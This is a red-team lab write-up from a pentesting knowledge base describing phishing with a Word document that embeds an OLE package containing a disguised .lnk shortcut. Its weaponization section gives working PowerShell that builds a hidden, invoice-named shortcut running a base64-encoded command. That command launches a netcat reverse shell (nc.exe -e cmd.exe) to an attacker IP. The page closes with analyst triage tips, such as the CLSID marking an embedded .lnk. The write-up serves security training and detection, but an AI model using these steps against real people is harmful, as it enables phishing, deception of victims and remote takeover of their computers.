Red Teaming Experiments
Red Teaming Experiments
linkedin
github
@spotheplanet
patreon
What is this?
Pinned
Pentesting Cheatsheets
Active Directory & Kerberos Abuse
offensive security
Red Team Infrastructure
Initial Access
Password Spraying Outlook Web Access: Remote Shell
Phishing with MS Office
Phishing: XLM / Macro 4.0
T1173: Phishing - DDE
T1137: Phishing - Office Macros
Phishing: OLE + LNK
Phishing: Embedded Internet Explorer
Phishing: .SLK Excel
Phishing: Replacing Embedded Video with Bogus Payload
Inject Macros from a Remote Dotm Template
Bypassing Parent Child / Ancestry Detections
Phishing: Embedded HTML Forms
Phishing with GoPhish and DigitalOcean
Forced Authentication
NetNTLMv2 hash stealing using Outlook
Code Execution
Code & Process Injection
Defense Evasion
Enumeration and Discovery
Privilege Escalation
Credential Access & Dumping
Lateral Movement
Persistence
Exfiltration
reversing, forensics & misc
Windows Kernel / Internals
Exploring Process Environment Block
ETW: Event Tracing for Windows 101
Parsing PE File Headers with C++
Exploring Injected Threads
Dump Virtual Box Memory
AES Encryption Using Crypto++ .lib in Visual Studio C++
Reversing Password Checking Routine
Powered by GitBook

Phishing: OLE + LNK

Phishing, Initial Access using embedded OLE + LNK objects

This lab explores a popular phishing technique where attackers embed .lnk files into the Office documents and camouflage them with Ms Word office icons in order to deceive victims to click and run them.

Weaponization

Creating an .LNK file that will trigger the payload once executed:

attacker@local
$command = 'Start-Process c:\shell.cmd'
$bytes = [System.Text.Encoding]::Unicode.GetBytes($command)
$encodedCommand = [Convert]::ToBase64String($bytes)
​
$obj = New-object -comobject wscript.shell
$link = $obj.createshortcut("c:\experiments\ole+lnk\Invoice-FinTech-0900541.lnk")
$link.windowstyle = "7"
$link.targetpath = "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
$link.iconlocation = "C:\Program Files\Windows NT\Accessories\wordpad.exe"
$link.arguments = "-Nop -sta -noni -w hidden -encodedCommand UwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAGMAOgBcAHMAaABlAGwAbAAuAGMAbQBkAA=="
$link.save()

Powershell payload will trigger a rudimentary NC reverse shell:

c:\shell.cmd
C:\tools\nc.exe 10.0.0.5 443 -e cmd.exe

Once the above powershell script is executed, an .LNK shortcut is created:

Let's create a Word document that will contain the malicious shortcut that was created in the previous step:

Let's insert a new object into the document by selecting a Packageand changing its icon source to a Microsoft Word executable:

Point the package to the .lnk file containing the payload:

Final result:

Execution

Victim executing the embedded document. Gets presented with a popup to confirm execution:

Once the victim confirms they want to open the file - the reverse shell comes back to the attacker:

Observations

After the payload is triggered, the process ancestry looks as expected - powershell gets spawned by winword, cmd is spawned by powershell..:

Soon after, the powershell gets killed and cmd.exe becomes an orphaned process:

Like in T1137: Phishing - Office Macros, you can use rudimentary tools on your Windows workstation to quickly triage the suspicious Office document. First off, rename the file to a .zip extension and unzip it. Then you can navigate to word\embeddings and find oleObject.bin file that contains the malicious .lnk:

Then you can do a simple strings or hexdump against the file and you should immediately see signs of something that should raise your eyebrow(s):

hexdump.exe -C .\oleObject1.bin

As an analyst, one should look for CLSID 00021401-0000-0000-c000-000000000046 in the .bin file, which signifies that the .doc contains an embnedded .lnk file. In our case this can be observed here:

References

Previous
T1137: Phishing - Office Macros
Next
Phishing: Embedded Internet Explorer
Last updated 2 years ago
Contents
Weaponization
Execution
Observations
References